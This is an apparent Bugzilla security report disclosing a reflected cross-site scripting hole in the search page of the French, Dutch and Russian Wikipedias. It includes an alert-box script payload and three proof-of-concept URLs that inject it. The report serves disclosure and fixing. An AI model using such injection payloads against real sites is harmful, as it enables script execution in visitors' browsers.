Author: bugzilla-wikipedia
Description:
Problem
It is possible to conduct a cross-site-scripting attack against the search page
when it displays Google and Yahoo search forms. There is a lack of validation
before returning the original query to the user.
Affected
It seems that only French, Dutch and Russian pages are displaying Google and
Yahoo search forms.
Attack vector
"><script>alert('XSS')</script>
PoC
http://fr.wikipedia.org/wiki/Special:Search?search=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&go=Go
http://nl.wikipedia.org/wiki/Special:Search?search=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&go=Go
http://ru.wikipedia.org/wiki/Special:Search?search=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&go=Go
Solution
Filter :)
Version: unspecified
Severity: critical
URL: http://xx.wikipedia.org/wiki/Special:Search